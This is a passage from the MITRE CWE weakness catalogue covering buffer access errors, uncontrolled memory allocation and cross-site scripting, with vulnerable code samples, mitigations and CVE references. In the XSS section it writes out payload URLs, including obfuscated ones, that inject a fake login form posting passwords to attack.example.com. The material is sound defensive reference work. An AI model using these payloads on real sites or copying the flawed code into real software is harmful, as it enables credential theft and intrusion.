AF_INET);strcpy(hostname, hp->h_name); + } + + This function allocates a buffer of 64 bytes to store the hostname, however there is no guarantee that the hostname will not be larger than 64 bytes. If an attacker specifies an address which resolves to a very large hostname, then the function may overwrite sensitive data or even relinquish control flow to the attacker. + Note that this example also contains an unchecked return value (CWE-252) that can lead to a NULL pointer dereference (CWE-476). + + + In the following example, it is possible to request that memcpy move a much larger segment of memory than assumed: + + int returnChunkSize(void *) { + + + /* if chunk info is valid, return the size of usable memory, + + + * else, return -1 to indicate an error + + + */ + ... + }int main() {...memcpy(destBuf, srcBuf, (returnChunkSize(destBuf)-1));...} + + If returnChunkSize() happens to encounter an error it will return -1. Notice that the return value is not checked before the memcpy operation (CWE-252), so -1 can be passed as the size argument to memcpy() (CWE-805). Because memcpy() assumes that the value is unsigned, it will be interpreted as MAXINT-1 (CWE-195), and therefore will copy far more memory than is likely available to the destination buffer (CWE-787, CWE-788). + + + This example applies an encoding procedure to an input string and stores it into a buffer. + + char * copy_input(char *user_supplied_string){ + int i, dst_index;char *dst_buf = (char*)malloc(4*sizeof(char) * MAX_SIZE);if ( MAX_SIZE <= strlen(user_supplied_string) ){die("user string too long, die evil hacker!");}dst_index = 0;for ( i = 0; i < strlen(user_supplied_string); i++ ){ + if( '&' == user_supplied_string[i] ){dst_buf[dst_index++] = '&';dst_buf[dst_index++] = 'a';dst_buf[dst_index++] = 'm';dst_buf[dst_index++] = 'p';dst_buf[dst_index++] = ';';}else if ('<' == user_supplied_string[i] ){ + + + /* encode to &lt; */ + + + }else dst_buf[dst_index++] = user_supplied_string[i]; + }return dst_buf; + } + + The programmer attempts to encode the ampersand character in the user-controlled string, however the length of the string is validated before the encoding procedure is applied. Furthermore, the programmer assumes encoding expansion will only expand a given character by a factor of 4, while the encoding of the ampersand expands by 5. As a result, when the encoding procedure expands the string it is possible to overflow the destination buffer if the attacker provides a string of many ampersands. + + + In the following C/C++ example the method processMessageFromSocket() will get a message from a socket, placed into a buffer, and will parse the contents of the buffer into a structure that contains the message length and the message body. A for loop is used to copy the message body into a local character string which will be passed to another method for processing. + + int processMessageFromSocket(int socket) { + int success; + char buffer[BUFFER_SIZE];char message[MESSAGE_SIZE]; + + // get message from socket and store into buffer + + + //Ignoring possibliity that buffer > BUFFER_SIZE + if (getMessage(socket, buffer, BUFFER_SIZE) > 0) { + + + // place contents of the buffer into message structure + ExMessage *msg = recastBuffer(buffer); + + // copy message body into string for processing + int index;for (index = 0; index < msg->msgLength; index++) {message[index] = msg->msgBody[index];}message[index] = '\0'; + + // process message + success = processMessage(message); + }return success; + } + + However, the message length variable from the structure is used as the condition for ending the for loop without validating that the message length variable accurately reflects the length of the message body (CWE-606). This can result in a buffer over-read (CWE-125) by reading from memory beyond the bounds of the buffer if the message length variable indicates a length that is longer than the size of a message body (CWE-130). + + + + + CVE-2009-2550 + Classic stack-based buffer overflow in media player using a long entry in a playlist + https://www.cve.org/CVERecord?id=CVE-2009-2550 + + + CVE-2009-2403 + Heap-based buffer overflow in media player using a long entry in a playlist + https://www.cve.org/CVERecord?id=CVE-2009-2403 + + + CVE-2009-0689 + large precision value in a format string triggers overflow + https://www.cve.org/CVERecord?id=CVE-2009-0689 + + + CVE-2009-0558 + attacker-controlled array index leads to code execution + https://www.cve.org/CVERecord?id=CVE-2009-0558 + + + CVE-2008-4113 + OS kernel trusts userland-supplied length value, allowing reading of sensitive information + https://www.cve.org/CVERecord?id=CVE-2008-4113 + + + CVE-2007-4268 + Chain: integer signedness error (CWE-195) passes signed comparison, leading to heap overflow (CWE-122) + https://www.cve.org/CVERecord?id=CVE-2007-4268 + + + + + ASCRM-CWE-788 + + + + + + + Discouraged + The CWE entry might be misused when lower-level CWE entries might be available. It also overlaps existing CWE entries and might be deprecated in the future. + If the "Access" operation is known to be a read or a write, then investigate children of entries such as CWE-787: Out-of-bounds Write and CWE-125: Out-of-bounds Read. + + + + + + + + CWE Content Team + MITRE + 2009-10-21 + 1.6 + 2009-10-29 + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Common_Consequences, Demonstrative_Examples, Observed_Examples, Relationships + + + CWE Content Team + MITRE + 2013-02-21 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2014-06-23 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2015-12-07 + updated Description + + + CWE Content Team + MITRE + 2017-05-03 + updated Description + + + CWE Content Team + MITRE + 2017-11-08 + updated Common_Consequences, Demonstrative_Examples, Observed_Examples + + + CWE Content Team + MITRE + 2019-01-03 + updated References, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-12-10 + updated Relationships + + + CWE Content Team + MITRE + 2021-07-20 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2022-04-28 + updated Description + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + Eric Constantin Brinz + GENIA-SEC IT-Sicherheitsmanagement GmbH + 2022-02-23 + Suggested corrections to extended description. + + + + + The product allocates memory based on an untrusted, large size value, but it does not ensure that the size is within expected limits, allowing arbitrary amounts of memory to be allocated. + + + + + + + Primary + + + Resultant + + + + + + + + + + Stack Exhaustion + When a weakness allocates excessive memory on the stack, it is often described as "stack exhaustion," which is a technical impact of the weakness. This technical impact is often encountered as a consequence of CWE-789 and/or CWE-1325. + + + + + Implementation + + + + + Availability + DoS: Resource Consumption (Memory) + Not controlling memory allocation can result in a request for too much system memory, possibly leading to a crash of the application due to out-of-memory conditions, or the consumption of a large amount of memory on the system. + + + + + Fuzzing + Fuzz testing (fuzzing) is a powerful technique for generating large numbers of diverse inputs - either randomly or algorithmically - and dynamically invoking the code with those inputs. Even with random inputs, it is often capable of generating unexpected results such as crashes, memory corruption, or resource consumption. Fuzzing effectively produces repeatable test cases that clearly indicate bugs, which helps developers to diagnose the issues. + High + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Implementation + Architecture and Design + Perform adequate input validation against any value that influences the amount of memory that is allocated. Define an appropriate strategy for handling requests that exceed the limit, and consider supporting a configuration option so that the administrator can extend the amount of memory to be used if necessary. + + + Operation + Run your program using system-provided resource limits for memory. This might still cause the program to crash or exit, but the impact to the rest of the system will be minimized. + + + + + Consider the following code, which accepts an untrusted size value and allocates a buffer to contain a string of the given size. + + unsigned int size = GetUntrustedInt(); + /* ignore integer overflow (CWE-190) for this example */ + + unsigned int totBytes = size * sizeof(char);char *string = (char *)malloc(totBytes);InitializeString(string); + + Suppose an attacker provides a size value of: + + + 12345678 + + + This will cause 305,419,896 bytes (over 291 megabytes) to be allocated for the string. + + + Consider the following code, which accepts an untrusted size value and uses the size as an initial capacity for a HashMap. + + unsigned int size = GetUntrustedInt();HashMap list = new HashMap(size); + + The HashMap constructor will verify that the initial capacity is not negative, however there is no check in place to verify that sufficient memory is present. If the attacker provides a large enough value, the application will run into an OutOfMemoryError. + + + This code performs a stack allocation based on a length calculation. + + + int a = 5, b = 6; + size_t len = a - b; + char buf[len]; // Just blows up the stack + + } + + Since a and b are declared as signed ints, the "a - b" subtraction gives a negative result (-1). However, since len is declared to be unsigned, len is cast to an extremely large positive number (on 32-bit systems - 4294967295). As a result, the buffer buf[len] declaration uses an extremely large size to allocate on the stack, very likely more than the entire computer's memory space. + Miscalculations usually will not be so obvious. The calculation will either be complicated or the result of an attacker's input to attain the negative value. + + + This example shows a typical attempt to parse a string with an error resulting from a difference in assumptions between the caller to a function and the function's action. + + int proc_msg(char *s, int msg_len) + { + + // Note space at the end of the string - assume all strings have preamble with space + int pre_len = sizeof("preamble: "); + char buf[pre_len - msg_len]; + ... Do processing here if we get this far + + } + char *s = "preamble: message\n"; + char *sl = strchr(s, ':'); // Number of characters up to ':' (not including space) + int jnklen = sl == NULL ? 0 : sl - s; // If undefined pointer, use zero length + int ret_val = proc_msg ("s", jnklen); // Violate assumption of preamble length, end up with negative value, blow out stack + + The buffer length ends up being -1, resulting in a blown out stack. The space character after the colon is included in the function calculation, but not in the caller's calculation. This, unfortunately, is not usually so obvious but exists in an obtuse series of calculations. + + + The following code obtains an untrusted number that is used as an index into an array of messages. + + my $num = GetUntrustedNumber();my @messages = (); + $messages[$num] = "Hello World"; + + The index is not validated at all (CWE-129), so it might be possible for an attacker to modify an element in @messages that was not intended. If an index is used that is larger than the current size of the array, the Perl interpreter automatically expands the array so that the large index works. + If $num is a large value such as 2147483648 (1<<31), then the assignment to $messages[$num] would attempt to create a very large array, then eventually produce an error message such as: + Out of memory during array extend + This memory exhaustion will cause the Perl program to exit, possibly a denial of service. In addition, the lack of memory could also prevent many other programs from successfully running on the system. + + + This example shows a typical attempt to parse a string with an error resulting from a difference in assumptions between the caller to a function and the function's action. The buffer length ends up being -1 resulting in a blown out stack. The space character after the colon is included in the function calculation, but not in the caller's calculation. This, unfortunately, is not usually so obvious but exists in an obtuse series of calculations. + + int proc_msg(char *s, int msg_len) + { + int pre_len = sizeof("preamble: "); // Note space at the end of the string - assume all strings have preamble with space + char buf[pre_len - msg_len]; + ... Do processing here and set status + return status; + } + + char *s = "preamble: message\n"; + char *sl = strchr(s, ':'); // Number of characters up to ':' (not including space) + int jnklen = sl == NULL ? 0 : sl - s; // If undefined pointer, use zero length + int ret_val = proc_msg ("s", jnklen); // Violate assumption of preamble length, end up with negative value, blow out stack + + + int proc_msg(char *s, int msg_len) + { + int pre_len = sizeof("preamble: "); // Note space at the end of the string - assume all strings have preamble with space + if (pre_len <= msg_len) { // Log error; return error_code; } + char buf[pre_len - msg_len]; + ... Do processing here and set status + return status; + } + + char *s = "preamble: message\n"; + char *sl = strchr(s, ':'); // Number of characters up to ':' (not including space) + int jnklen = sl == NULL ? 0 : sl - s; // If undefined pointer, use zero length + int ret_val = proc_msg ("s", jnklen); // Violate assumption of preamble length, end up with negative value, blow out stack + + + + + + CVE-2022-21668 + Chain: Python library does not limit the resources used to process images that specify a very large number of bands (CWE-1284), leading to excessive memory consumption (CWE-789) or an integer overflow (CWE-190). + https://www.cve.org/CVERecord?id=CVE-2022-21668 + + + CVE-2010-3701 + program uses ::alloca() for encoding messages, but large messages trigger segfault + https://www.cve.org/CVERecord?id=CVE-2010-3701 + + + CVE-2008-1708 + memory consumption and daemon exit by specifying a large value in a length field + https://www.cve.org/CVERecord?id=CVE-2008-1708 + + + CVE-2008-0977 + large value in a length field leads to memory consumption and crash when no more memory is available + https://www.cve.org/CVERecord?id=CVE-2008-0977 + + + CVE-2006-3791 + large key size in game program triggers crash when a resizing function cannot allocate enough memory + https://www.cve.org/CVERecord?id=CVE-2006-3791 + + + CVE-2004-2589 + large Content-Length HTTP header value triggers application crash in instant messaging application due to failure in memory allocation + https://www.cve.org/CVERecord?id=CVE-2004-2589 + + + + + 35 + SOAP Array Abuse + + + MEM35-C + Allocate sufficient memory for an object + Imprecise + + + IDS32-PL + Validate any integer that is used as an array index + Imprecise + + + ASCSM-CWE-789 + + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + This weakness can be closely associated with integer overflows (CWE-190). Integer overflow attacks would concentrate on providing an extremely large number that triggers an overflow that causes less memory to be allocated than expected. By providing a large value that does not trigger an integer overflow, the attacker could still cause excessive amounts of memory to be allocated. + + Uncontrolled memory allocation is possible in many languages, such as dynamic array allocation in perl or initial size parameters in Collections in Java. However, languages like C and C++ where programmers have the power to more directly control memory management will be more susceptible. + + + + + CWE Content Team + MITRE + 2009-10-21 + 1.6 + 2009-10-29 + + + CWE Content Team + MITRE + 2010-02-16 + updated Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-03-29 + updated Common_Consequences, Observed_Examples + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated References + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-01-03 + updated References, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-06-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Relationships + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-12-10 + updated Alternate_Terms, Demonstrative_Examples, Description, Likelihood_of_Exploit, Name, Observed_Examples, Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2021-03-15 + updated Demonstrative_Examples, Relationships + + + CWE Content Team + MITRE + 2022-10-13 + updated Observed_Examples + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes, Relationships + + Uncontrolled Memory Allocation + + + + The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users. + + Cross-site scripting (XSS) vulnerabilities occur when: + + Untrusted data enters a web application, typically from a web request. + The web application dynamically generates a web page that contains this untrusted data. + During page generation, the application does not prevent the data from containing content that is executable by a web browser, such as JavaScript, HTML tags, HTML attributes, mouse events, Flash, ActiveX, etc. + A victim visits the generated web page through a web browser, which contains malicious script that was injected using the untrusted data. + Since the script comes from a web page that was sent by the web server, the victim's web browser executes the malicious script in the context of the web server's domain. + This effectively violates the intention of the web browser's same-origin policy, which states that scripts in one domain should not be able to access resources or run code in a different domain. + + There are three main kinds of XSS: + + + Type 1: Reflected XSS (or Non-Persistent) - + The server reads data directly from the HTTP request and reflects it back in the HTTP response. Reflected XSS exploits occur when an attacker causes a victim to supply dangerous content to a vulnerable web application, which is then reflected back to the victim and executed by the web browser. The most common mechanism for delivering malicious content is to include it as a parameter in a URL that is posted publicly or e-mailed directly to the victim. URLs constructed in this manner constitute the core of many phishing schemes, whereby an attacker convinces a victim to visit a URL that refers to a vulnerable site. After the site reflects the attacker's content back to the victim, the content is executed by the victim's browser. + + Type 2: Stored XSS (or Persistent) - + The application stores dangerous data in a database, message forum, visitor log, or other trusted data store. At a later time, the dangerous data is subsequently read back into the application and included in dynamic content. From an attacker's perspective, the optimal place to inject malicious content is in an area that is displayed to either many users or particularly interesting users. Interesting users typically have elevated privileges in the application or interact with sensitive data that is valuable to the attacker. If one of these users executes malicious content, the attacker may be able to perform privileged operations on behalf of the user or gain access to sensitive data belonging to the user. For example, the attacker might inject XSS into a log message, which might not be handled properly when an administrator views the logs. + + + Type 0: DOM-Based XSS - + In DOM-based XSS, the client performs the injection of XSS into the page; in the other types, the server performs the injection. DOM-based XSS generally involves server-controlled, trusted script that is sent to the client, such as Javascript that performs sanity checks on a form before the user submits it. If the server-supplied script processes user-supplied data and then injects it back into the web page (such as with dynamic HTML), then DOM-based XSS is possible. + + + Once the malicious script is injected, the attacker can perform a variety of malicious activities. The attacker could transfer private information, such as cookies that may include session information, from the victim's machine to the attacker. The attacker could send malicious requests to a web site on behalf of the victim, which could be especially dangerous to the site if the victim has administrator privileges to manage that site. Phishing attacks could be used to emulate trusted web sites and trick the victim into entering a password, allowing the attacker to compromise the victim's account on that web site. Finally, the script could exploit a vulnerability in the web browser itself possibly taking over the victim's machine, sometimes referred to as "drive-by hacking." + In many cases, the attack can be launched without the victim even being aware of it. Even with careful users, attackers frequently use a variety of methods to encode the malicious portion of the attack, such as URL encoding or Unicode, so the request looks less suspicious. + + + + + + + + + + Resultant + + + + + + + + + The Same Origin Policy states that browsers should limit the resources accessible to scripts running on a given web site, or "origin", to the resources associated with that web site on the client-side, and not the client-side resources of any other sites or "origins". The goal is to prevent one site from being able to modify or read the contents of an unrelated site. Since the World Wide Web involves interactions between many sites, this policy is important for browsers to enforce. + When referring to XSS, the Domain of a website is roughly equivalent to the resources associated with that website on the client-side of the connection. That is, the domain can be thought of as all resources the browser is storing for the user's interactions with this particular site. + + + + + XSS + A common abbreviation for Cross-Site Scripting. + + + HTML Injection + Used as a synonym of stored (Type 2) XSS. + + + CSS + In the early years after initial discovery of XSS, "CSS" was a commonly-used acronym. However, this would cause confusion with "Cascading Style Sheets," so usage of this acronym has declined significantly. + + + + + Implementation + REALIZATION: This weakness is caused during implementation of an architectural security tactic. + + + High + + + Access Control + Confidentiality + Bypass Protection Mechanism + Read Application Data + The most common attack performed with cross-site scripting involves the disclosure of information stored in user cookies. Typically, a malicious user will craft a client-side script, which -- when parsed by a web browser -- performs some activity (such as sending all site cookies to a given E-mail address). This script will be loaded and run by each user visiting the web site. Since the site requesting to run the script has access to the cookies in question, the malicious script does also. + + + Integrity + Confidentiality + Availability + Execute Unauthorized Code or Commands + In some circumstances it may be possible to run arbitrary code on a victim's computer when cross-site scripting is combined with other flaws. + + + Confidentiality + Integrity + Availability + Access Control + Execute Unauthorized Code or Commands + Bypass Protection Mechanism + Read Application Data + The consequence of an XSS attack is the same regardless of whether it is stored or reflected. The difference is in how the payload arrives at the server. XSS can cause a variety of problems for the end user that range in severity from an annoyance to complete account compromise. Some cross-site scripting vulnerabilities can be exploited to manipulate or steal cookies, create requests that can be mistaken for those of a valid user, compromise confidential information, or execute malicious code on the end user systems for a variety of nefarious purposes. Other damaging attacks include the disclosure of end user files, installation of Trojan horse programs, redirecting the user to some other page or site, running "Active X" controls (under Microsoft Internet Explorer) from sites that a user perceives as trustworthy, and modifying presentation of content. + + + + + Automated Static Analysis + Use automated static analysis tools that target this type of weakness. Many modern techniques use data flow analysis to minimize the number of false positives. This is not a perfect solution, since 100% accuracy and coverage are not feasible, especially when multiple components are involved. + Moderate + + + Black Box + Use the XSS Cheat Sheet [REF-714] or automated test-generation tools to help launch a wide variety of attacks against your web application. The Cheat Sheet contains many subtle XSS variations that are specifically targeted against weak XSS defenses. + Moderate + With Stored XSS, the indirection caused by the data store can make it more difficult to find the problem. The tester must first inject the XSS string into the data store, then find the appropriate application functionality in which the XSS string is sent to other users of the application. These are two distinct steps in which the activation of the XSS can take place minutes, hours, or days after the XSS was originally injected into the data store. + + + + + Architecture and Design + Libraries or Frameworks + + Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid. + Examples of libraries and frameworks that make it easier to generate properly encoded output include Microsoft's Anti-XSS library, the OWASP ESAPI Encoding module, and Apache Wicket. + + + + Implementation + Architecture and Design + + Understand the context in which your data will be used and the encoding that will be expected. This is especially important when transmitting data between different components, or when generating outputs that can contain multiple encodings at the same time, such as web pages or multi-part mail messages. Study all expected communication protocols and data representations to determine the required encoding strategies. + For any data that will be output to another web page, especially any data that was received from external inputs, use the appropriate encoding on all non-alphanumeric characters. + Parts of the same output document may require different encodings, which will vary depending on whether the output is in the: + + HTML body + Element attributes (such as src="XYZ") + URIs + JavaScript sections + Cascading Style Sheets and style property + + etc. Note that HTML Entity Encoding is only appropriate for the HTML body. + Consult the XSS Prevention Cheat Sheet [REF-724] for more details on the types of encoding and escaping that are needed. + + + + Architecture and Design + Implementation + Attack Surface Reduction + Understand all the potential areas where untrusted inputs can enter your software: parameters or arguments, cookies, anything read from the network, environment variables, reverse DNS lookups, query results, request headers, URL components, e-mail, files, filenames, databases, and any external systems that provide data to the application. Remember that such inputs may be obtained indirectly through API calls. + Limited + This technique has limited effectiveness, but can be helpful when it is possible to store client state and sensitive information on the server side instead of in cookies, headers, hidden form fields, etc. + + + Architecture and Design + For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server. + + + Architecture and Design + Parameterization + If available, use structured mechanisms that automatically enforce the separation between data and code. These mechanisms may be able to provide the relevant quoting, encoding, and validation automatically, instead of relying on the developer to provide this capability at every point where output is generated. + + + Implementation + Output Encoding + + Use and specify an output encoding that can be handled by the downstream component that is reading the output. Common encodings include ISO-8859-1, UTF-7, and UTF-8. When an encoding is not specified, a downstream component may choose a different encoding, either by assuming a default encoding or automatically inferring which encoding is being used, which can be erroneous. When the encodings are inconsistent, the downstream component might treat some character or byte sequences as special, even if they are not special in the original encoding. Attackers might then be able to exploit this discrepancy and conduct injection attacks; they even might be able to bypass protection mechanisms that assume the original encoding is also being used by the downstream component. + The problem of inconsistent output encodings often arises in web pages. If an encoding is not specified in an HTTP header, web browsers often guess about which encoding is being used. This can open up the browser to subtle XSS attacks. + + + + Implementation + With Struts, write all data from form beans with the bean's filter attribute set to true. + + + Implementation + Attack Surface Reduction + To help mitigate XSS attacks against the user's session cookie, set the session cookie to be HttpOnly. In browsers that support the HttpOnly feature (such as more recent versions of Internet Explorer and Firefox), this attribute can prevent the user's session cookie from being accessible to malicious client-side scripts that use document.cookie. This is not a complete solution, since HttpOnly is not supported by all browsers. More importantly, XMLHTTPRequest and other powerful browser technologies provide read access to HTTP headers, including the Set-Cookie header in which the HttpOnly flag is set. + Defense in Depth + + + Implementation + Input Validation + + Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. + When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." + Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. + When dynamically constructing web pages, use stringent allowlists that limit the character set based on the expected value of the parameter in the request. All input should be validated and cleansed, not just parameters that the user is supposed to specify, but all data in the request, including hidden fields, cookies, headers, the URL itself, and so forth. A common mistake that leads to continuing XSS vulnerabilities is to validate only fields that are expected to be redisplayed by the site. It is common to see data from the request that is reflected by the application server or the application that the development team did not anticipate. Also, a field that is not currently reflected may be used by a future developer. Therefore, validating ALL parts of the HTTP request is recommended. + Note that proper output encoding, escaping, and quoting is the most effective solution for preventing XSS, although input validation may provide some defense-in-depth. This is because it effectively limits what will appear in output. Input validation will not always prevent XSS, especially if you are required to support free-form text fields that could contain arbitrary characters. For example, in a chat application, the heart emoticon ("<3") would likely pass the validation step, since it is commonly used. However, it cannot be directly inserted into the web page because it contains the "<" character, which would need to be escaped or otherwise handled. In this case, stripping the "<" might reduce the risk of XSS, but it would produce incorrect behavior because the emoticon would not be recorded. This might seem to be a minor inconvenience, but it would be more important in a mathematical forum that wants to represent inequalities. + Even if you make a mistake in your validation (such as forgetting one out of 100 input fields), appropriate encoding is still likely to protect you from injection-based attacks. As long as it is not done in isolation, input validation is still a useful technique, since it may significantly reduce your attack surface, allow you to detect some attacks, and provide other security benefits that proper encoding does not address. + Ensure that you perform input validation at well-defined interfaces within the application. This will help protect the application even if a component is reused or moved elsewhere. + + + + Architecture and Design + Enforcement by Conversion + When the set of acceptable objects, such as filenames or URLs, is limited or known, create a mapping from a set of fixed input values (such as numeric IDs) to the actual filenames or URLs, and reject all other inputs. + + + Operation + Firewall + Use an application firewall that can detect attacks against this weakness. It can be beneficial in cases in which the code cannot be fixed (because it is controlled by a third party), as an emergency prevention measure while more comprehensive software assurance measures are applied, or to provide defense in depth. + Moderate + An application firewall might not cover all possible input vectors. In addition, attack techniques might be available to bypass the protection mechanism, such as using malformed inputs that can still be processed by the component that receives those inputs. Depending on functionality, an application firewall might inadvertently reject or modify legitimate requests. Finally, some manual effort may be required for customization. + + + Operation + Implementation + Environment Hardening + When using PHP, configure the application so that it does not use register_globals. During implementation, develop the application so that it does not rely on this feature, but be wary of implementing a register_globals emulation that is subject to weaknesses such as CWE-95, CWE-621, and similar issues. + + + + + The following code displays a welcome message on a web page based on the HTTP GET username parameter (covers a Reflected XSS (Type 1) scenario). + + $username = $_GET['username'];echo '<div class="header"> Welcome, ' . $username . '</div>'; + + Because the parameter can be arbitrary, the url of the page could be modified so $username contains scripting syntax, such as + + http://trustedSite.example.com/welcome.php?username=<Script Language="Javascript">alert("You've been attacked!");</Script> + + This results in a harmless alert dialog popping up. Initially this might not appear to be much of a vulnerability. After all, why would someone enter a URL that causes malicious code to run on their own computer? The real danger is that an attacker will create the malicious URL, then use e-mail or social engineering tricks to lure victims into visiting a link to the URL. When victims click the link, they unwittingly reflect the malicious content through the vulnerable web application back to their own computers. + More realistically, the attacker can embed a fake login box on the page, tricking the user into sending the user's password to the attacker: + + http://trustedSite.example.com/welcome.php?username=<div id="stealPassword">Please Login:<form name="input" action="http://attack.example.com/stealPassword.php" method="post">Username: <input type="text" name="username" /><br/>Password: <input type="password" name="password" /><br/><input type="submit" value="Login" /></form></div> + + If a user clicks on this link then Welcome.php will generate the following HTML and send it to the user's browser: + + <div class="header"> Welcome, <div id="stealPassword"> Please Login: + <form name="input" action="attack.example.com/stealPassword.php" method="post">Username: <input type="text" name="username" /><br/>Password: <input type="password" name="password" /><br/><input type="submit" value="Login" /></form> + </div></div> + + The trustworthy domain of the URL may falsely assure the user that it is OK to follow the link. However, an astute user may notice the suspicious text appended to the URL. An attacker may further obfuscate the URL (the following example links are broken into multiple lines for readability): + + trustedSite.example.com/welcome.php?username=%3Cdiv+id%3D%22stealPassword%22%3EPlease+Login%3A%3Cform+name%3D%22input%22+action%3D%22http%3A%2F%2Fattack.example.com%2FstealPassword.php%22+method%3D%22post%22%3EUsername%3A+%3Cinput+type%3D%22text%22+name%3D%22username%22+%2F%3E%3Cbr%2F%3EPassword%3A+%3Cinput+type%3D%22password%22+name%3D%22password%22+%2F%3E%3Cinput+type%3D%22submit%22+value%3D%22Login%22+%2F%3E%3C%2Fform%3E%3C%2Fdiv%3E%0D%0A + + The same attack string could also be obfuscated as: + + trustedSite.example.com/welcome.php?username=<script+type="text/javascript">document.write('\u003C\u0064\u0069\u0076\u0020\u0069\u0064\u003D\u0022\u0073\u0074\u0065\u0061\u006C\u0050\u0061\u0073\u0073\u0077\u006F\u0072\u0064\u0022\u003E\u0050\u006C\u0065\u0061\u0073\u0065\u0020\u004C\u006F\u0067\u0069\u006E\u003A\u003C\u0066\u006F\u0072\u006D\u0020\u006E\u0061\u006D\u0065\u003D\u0022\u0069\u006E\u0070\u0075\u0074\u0022\u0020\u0061\u0063\u0074\u0069\u006F\u006E\u003D\u0022\u0068\u0074\u0074\u0070\u003A\u002F\u002F\u0061\u0074\u0074\u0061\u0063\u006B\u002E\u0065\u0078\u0061\u006D\u0070\u006C\u0065\u002E\u0063\u006F\u006D\u002F\u0073\u0074\u0065\u0061\u006C\u0050\u0061\u0073\u0073\u0077\u006F\u0072\u0064\u002E\u0070\u0068\u0070\u0022\u0020\u006D\u0065\u0074\u0068\u006F\u0064\u003D\u0022\u0070\u006F\u0073\u0074\u0022\u003E\u0055\u0073\u0065\u0072\u006E\u0061\u006D\u0065\u003A\u0020\u003C\u0069\u006E\u0070\u0075\u0074\u0020\u0074\u0079\u0070\u0065\u003D\u0022\u0074\u0065\u0078\u0074\u0022\u0020\u006E\u0061\u006D\u0065\u003D\u0022\u0075\u0073\u0065\u0072\u006E\u0061\u006D\u0065\u0022\u0020\u002F\u003E\u003C\u0062\u0072\u002F\u003E\u0050\u0061\u0073\u0073\u0077\u006F\u0072\u0064\u003A\u0020\u003C\u0069\u006E\u0070\u0075\u0074\u0020\u0074\u0079\u0070\u0065\u003D\u0022\u0070\u0061\u0073\u0073\u0077\u006F\u0072\u0064\u0022\u0020\u006E\u0061\u006D\u0065\u003D\u0022\u0070\u0061\u0073\u0073\u0077\u006F\u0072\u0064\u0022\u0020\u002F\u003E\u003C\u0069\u006E\u0070\u0075\u0074\u0020\u0074\u0079\u0070\u0065\u003D\u0022\u0073\u0075\u0062\u006D\u0069\u0074\u0022\u0020\u0076\u0061\u006C\u0075\u0065\u003D\u0022\u004C\u006F\u0067\u0069\u006E\u0022\u0020\u002F\u003E\u003C\u002F\u0066\u006F\u0072\u006D\u003E\u003C\u002F\u0064\u0069\u0076\u003E\u000D');</script> + + Both of these attack links will result in the fake login box appearing on the page, and users are more likely to ignore indecipherable text at the end of URLs. + + + The following code displays a Reflected XSS (Type 1) scenario. + The following JSP code segment reads an employee ID, eid, from an HTTP request and displays it to the user. + + <% String eid = request.getParameter("eid"); %>...Employee ID: <%= eid %> + + The following ASP.NET code segment reads an employee ID number from an HTTP request and displays it to the user. + + <%protected System.Web.UI.WebControls.TextBox Login;protected System.Web.UI.WebControls.Label EmployeeID;...EmployeeID.Text = Login.Text;%> + <p><asp:label id="EmployeeID" runat="server" /></p> + + The code in this example operates correctly if the Employee ID variable contains only standard alphanumeric text. If it has a value that includes meta-characters or source code, then the code will be executed by the web browser as it displays the HTTP response. + + + The following code displays a Stored XSS (Type 2) scenario. + The following JSP code segment queries a database for an employee with a given ID and prints the corresponding employee's name. + + <%Statement stmt = conn.createStatement();ResultSet rs = stmt.executeQuery("select * from emp where id="+eid);if (rs != null) {rs.next();String name = rs.getString("name");}%> + Employee Name: <%= name %> + + The following ASP.NET code segment queries a database for an employee with a given employee ID and prints the name corresponding with the ID. + + <%protected 